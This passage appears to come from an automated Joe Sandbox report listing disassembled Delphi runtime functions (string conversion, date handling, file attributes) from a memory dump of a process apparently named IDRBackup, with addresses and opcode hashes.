                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$Asg$qqrr20CharClr$qqrpvCommandFileFromLen$qqrr20LineModuleMove$qqrpxvpviNameStringString$qqriStringpbiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2864874161-0
                                                                                                  • Opcode ID: b2b830a017bee59d4e872495292ad1b13696414d59f0388ff4c3bb92921b499a
                                                                                                  • Instruction ID: 6a03e17f4bd4c64ae8d53e0fe39c767496f35d0f4fe9983f0094101a5260a8ef
                                                                                                  • Opcode Fuzzy Hash: b2b830a017bee59d4e872495292ad1b13696414d59f0388ff4c3bb92921b499a
                                                                                                  • Instruction Fuzzy Hash: CCF02EB174569053F75191AC5CA1BDF51CA4BC5551F994336BF0CCB342EE70CC0082C6
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002689B
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,500268EC,?,?,?,?,00000000), ref: 500268C0
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500268EC,?,?,?,?,00000000), ref: 500268CB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20MetaRecxiStringStringpx14Stringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2203270808-0
                                                                                                  • Opcode ID: ccc7b6e6f2e119070dd8617dd0e382500ae0a435e3e97db025f3ba1d8bace3fb
                                                                                                  • Instruction ID: 62b2d6722134464f4681b16f86bc22ffda435385ec3fff5c8aa35c22120bf3af
                                                                                                  • Opcode Fuzzy Hash: ccc7b6e6f2e119070dd8617dd0e382500ae0a435e3e97db025f3ba1d8bace3fb
                                                                                                  • Instruction Fuzzy Hash: 48F0C275600689AFE700CF94EC51C5AB7ADEB89720B918372F90883740DB31EE01C6D0
                                                                                                  APIs
                                                                                                  • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,5001551A,?,?,?,00000000,00000000), ref: 500154DC
                                                                                                    • Part of subcall function 50019EBC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019EF5
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F08
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F13
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F1F
                                                                                                    • Part of subcall function 50019EBC: CharUpperBuffW.USER32(00000000,?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000), ref: 50019F25
                                                                                                  • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(?,00000000,5001551A,?,?,?,00000000,00000000), ref: 500154EA
                                                                                                  • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,5001551A,?,?,?,00000000,00000000), ref: 500154F3
                                                                                                    • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                    • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$String$System@@$Ansi$Char$qqrx20$From$InternalStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%Upper$Case$qqrx20Char$BuffLen$qqrr20Pos$qqrx20StringpbiStringt1
                                                                                                  • String ID:
                                                                                                  • API String ID: 1811596575-0
                                                                                                  • Opcode ID: f8655f718251c2dc71c6e2303aeecd35c5678775ca9ef57c7831b282cf33942c
                                                                                                  • Instruction ID: c0b1a5ea2b56544e033e8cc658cc13535f1bdf9ea375e6b9a9d5c146db7ca2d2
                                                                                                  • Opcode Fuzzy Hash: f8655f718251c2dc71c6e2303aeecd35c5678775ca9ef57c7831b282cf33942c
                                                                                                  • Instruction Fuzzy Hash: 74F0E936705744AFEB01CAE4DC51B9DB7EDDB48210F518572F900D7341D6749E0086D4
                                                                                                  APIs
                                                                                                  • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5C7
                                                                                                    • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                    • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                  • @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5D5
                                                                                                    • Part of subcall function 500286A0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286AB
                                                                                                    • Part of subcall function 500286A0: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286C5
                                                                                                    • Part of subcall function 500286A0: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286D5
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5E0
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288BC
                                                                                                    • Part of subcall function 50019F4C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019FD0), ref: 50019F85
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019FD0), ref: 50019F98
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019FD0), ref: 50019FA3
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019FD0), ref: 50019FAF
                                                                                                    • Part of subcall function 50019F4C: CharLowerBuffW.USER32(00000000,?,00000000,50019FD0), ref: 50019FB5
                                                                                                  • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288CA
                                                                                                  • @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288D3
                                                                                                    • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019BF4
                                                                                                    • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C09
                                                                                                    • Part of subcall function 50019BD4: @System@@LStrArrayClr$qqrpvi.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C5A
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?), ref: 5001BC21
                                                                                                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 5001BC27
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,00000000,?), ref: 5001BC3E
                                                                                                  • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 5001BC4F
                                                                                                  APIs
                                                                                                  • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216C2
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216CA
                                                                                                  • @Sysutils@TextToFloat$qqrpcpv20Sysutils@TFloatValuerx24Sysutils@TFormatSettings.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216D3
                                                                                                    • Part of subcall function 50021580: @System@FPower10$qqrv.RTL120 ref: 50021606
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(500216F7,?,?,?,00000000), ref: 500216EA
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  APIs
                                                                                                  • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,5002888D,?,?,?,00000000,00000000), ref: 50028854
                                                                                                    • Part of subcall function 50019F4C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019FD0), ref: 50019F85
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019FD0), ref: 50019F98
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019FD0), ref: 50019FA3
                                                                                                    • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019FD0), ref: 50019FAF
                                                                                                    • Part of subcall function 50019F4C: CharLowerBuffW.USER32(00000000,?,00000000,50019FD0), ref: 50019FB5
                                                                                                  • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,5002888D,?,?,?,00000000,00000000), ref: 50028862
                                                                                                  • @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,5002888D,?,?,?,00000000,00000000), ref: 5002886B
                                                                                                    • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019BF4
                                                                                                    • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C09
                                                                                                    • Part of subcall function 50019BD4: @System@@LStrArrayClr$qqrpvi.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C5A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$StringSystem@@$Ansi$From$LowerStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Case$qqrx20CharChar$qqrx20$ArrayBuffClr$qqrpviCompareInternalLen$qqrr20Str$qqrx20StringpbiStringt1
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714845271-0
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026923
                                                                                                  • @Sysutils@LoadStr$qqri.RTL120(00000000,5002696D,?,?,?,?,00000000), ref: 50026941
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002696D,?,?,?,?,00000000), ref: 5002694C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$Asg$qqrr20ClassClassoCreate$qqrp17LoadMetaStr$qqriStringStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1550118436-0
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50015CAE), ref: 50015C87
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50015CAE), ref: 50015C93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$Asg$qqrr20StringStringx20System@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2900266584-0
                                                                                                  APIs
                                                                                                  • @System@@LGetDir$qqrucr27System@%AnsiStringT$us$i0$%.RTL120(00000000,50004446), ref: 50004409
                                                                                                    • Part of subcall function 500042F0: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004321
                                                                                                    • Part of subcall function 500042F0: SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004327
                                                                                                    • Part of subcall function 500042F0: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004336
                                                                                                    • Part of subcall function 500042F0: SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004347
                                                                                                    • Part of subcall function 500042F0: @System@@LStrFromArray$qqrr27System@%AnsiStringT$us$i0$%pcius.RTL120(00000000,00000105,?), ref: 50004359
                                                                                                  • @System@@LStrToString$qqrv.RTL120(00000000,50004446), ref: 5000441C
                                                                                                    • Part of subcall function 50008BDC: @System@Move$qqrpxvpvi.RTL120(?,50004421,00000000,50004446), ref: 50008BF2
                                                                                                  • @System@@PStrNCpy$qqrp28System@%SmallString$iuc$255%t1uc.RTL120(00000000,50004446), ref: 5000442B
                                                                                                    • Part of subcall function 50004F14: @System@Move$qqrpxvpvi.RTL120(?,50004430,00000000,50004446), ref: 50004F26
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000444D), ref: 50004440
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@@$CurrentDirectory$System@%$AnsiMove$qqrpxvpviStringSystem@$Array$qqrr27Clr$qqrpvCpy$qqrp28Dir$qqrucr27FreeFromMem$qqrpvSmallString$iuc$255%t1ucString$qqrvT$us$i0$%T$us$i0$%pcius
                                                                                                  • String ID:
                                                                                                  • API String ID: 506161246-0
                                                                                                  APIs
                                                                                                  • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 50021542
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 5002154A
                                                                                                  • @Sysutils@TextToFloat$qqrpcpv20Sysutils@TFloatValue.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 50021553
                                                                                                    • Part of subcall function 50021408: @System@FPower10$qqrv.RTL120(00000000,00000000,?,00000000), ref: 5002148D
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50021577,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 5002156A
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%Sysutils@$Char$qqrr27Char$qqrx27Clr$qqrpvFloatFloat$qqrpcpv20FreeFromMem$qqrpvPower10$qqrvSystem@T$us$i0$%T$us$i0$%pbusTextValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3332700872-0
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026677
                                                                                                  • @Sysutils@LoadStr$qqri.RTL120(00000000,500266BB,?,?,?,?,00000000), ref: 50026695
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500266BB,?,?,?,?,00000000), ref: 500266A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$Asg$qqrr20ClassClassoCreate$qqrp17LoadMetaStr$qqriStringStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1550118436-0
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 5001106D
                                                                                                  • @Character@TCharacter@CheckPunctuation$qqr26Character@TUnicodeCategory.RTL120 ref: 50011080
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50011090
                                                                                                  • @Character@TCharacter@CheckPunctuation$qqr26Character@TUnicodeCategory.RTL120 ref: 500110C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Character@$CategoryCheckPunctuation$qqr26Unicode$Initialize$qqrvLatin1$qqrb
                                                                                                  • String ID:
                                                                                                  • API String ID: 484436152-0
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500114F9
                                                                                                  • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120 ref: 5001150C
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 5001151C
                                                                                                  • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120 ref: 50011555
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Character@$CategoryCheckSymbol$qqr26Unicode$Initialize$qqrvLatin1$qqrb
                                                                                                  • String ID:
                                                                                                  • API String ID: 691609695-0
                                                                                                  • Opcode ID: fe5f3e23eb1f0a261a5750bcabd28b339d05d764b1ddcb6578aceedb70423048
                                                                                                  • Instruction ID: 7b396b0d8ffb9378e5810028f15ef3c5548f1d5ddace2a8aa8357158f6fe202e
                                                                                                  • Opcode Fuzzy Hash: fe5f3e23eb1f0a261a5750bcabd28b339d05d764b1ddcb6578aceedb70423048
                                                                                                  • Instruction Fuzzy Hash: 37F0BE91B154A04BD31887A1EC6127533E367D531274841BEF487CB2A3DB38C9E9E660
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 5000FDE5
                                                                                                  • @Character@TCharacter@CheckLetterOrDigit$qqr26Character@TUnicodeCategory.RTL120 ref: 5000FDF8
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 5000FE08
                                                                                                  • @Character@TCharacter@CheckLetterOrDigit$qqr26Character@TUnicodeCategory.RTL120 ref: 5000FE41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$CategoryCheckDigit$qqr26LetterUnicode$Initialize$qqrvLatin1$qqrb
                                                                                                  • String ID:
                                                                                                  • API String ID: 2959744918-0
                                                                                                  • Opcode ID: 4afa2171aba2d9f68dd23a365b8fc527f00494e3b3889e4d18b820f2ec625961
                                                                                                  • Instruction ID: 8531ad5159720f12bcde5a57509ad96e286a1192af97af35f1695361cdd7992d
                                                                                                  • Opcode Fuzzy Hash: 4afa2171aba2d9f68dd23a365b8fc527f00494e3b3889e4d18b820f2ec625961
                                                                                                  • Instruction Fuzzy Hash: C9F0BE91B154A00BE31487A5EC7267433E3679530278841BEF487CB6A7DF388AE9E720
                                                                                                  APIs
                                                                                                  • @Sysutils@DecodeDate$qqrx16System@TDateTimerust2t2.RTL120(?,?), ref: 500226C4
                                                                                                    • Part of subcall function 500224F0: @Sysutils@DecodeDateFully$qqrx16System@TDateTimerust2t2t2.RTL120(?,?,5001D662,?,?,?,5001D662,?,?), ref: 50022503
                                                                                                  • @Sysutils@IncAMonth$qqrrust1t1i.RTL120(?,?,?), ref: 500226D3
                                                                                                    • Part of subcall function 50022708: @Sysutils@IsLeapYear$qqrus.RTL120 ref: 50022767
                                                                                                  • @Sysutils@EncodeDate$qqrususus.RTL120(?,?,?), ref: 500226E4
                                                                                                    • Part of subcall function 50022374: @Sysutils@TryEncodeDate$qqrusususr16System@TDateTime.RTL120 ref: 50022387
                                                                                                  • @Sysutils@ReplaceTime$qqrr16System@TDateTimex16System@TDateTime.RTL120(?,?,?,?,?), ref: 500226F6
                                                                                                    • Part of subcall function 50022798: @System@@TRUNC$qqrv.RTL120 ref: 500227A3
                                                                                                    • Part of subcall function 50022798: @System@Frac$qqrxg.RTL120 ref: 500227CC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sysutils@$DateSystem@$DecodeEncodeTime$C$qqrvDate$qqrusususDate$qqrusususr16Date$qqrx16Frac$qqrxgFully$qqrx16LeapMonth$qqrrust1t1iReplaceSystem@@Time$qqrr16Timerust2t2Timerust2t2t2Timex16Year$qqrus
                                                                                                  • String ID:
                                                                                                  • API String ID: 4205208091-0
                                                                                                  • Opcode ID: 588e2177f7e5a343351c1f5257f7af4bba4bff301c8b8eac32b1d71317e14410
                                                                                                  • Instruction ID: 90397f2099132ae17983f43b1299ad6055f1b282f2460c1bcfdd474071a034a8
                                                                                                  • Opcode Fuzzy Hash: 588e2177f7e5a343351c1f5257f7af4bba4bff301c8b8eac32b1d71317e14410
                                                                                                  • Instruction Fuzzy Hash: 15F0A97180510FBACF009FD1E9818ECBBB9FF54219F408692F85465151EB32A769D794
                                                                                                  APIs
                                                                                                  • @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
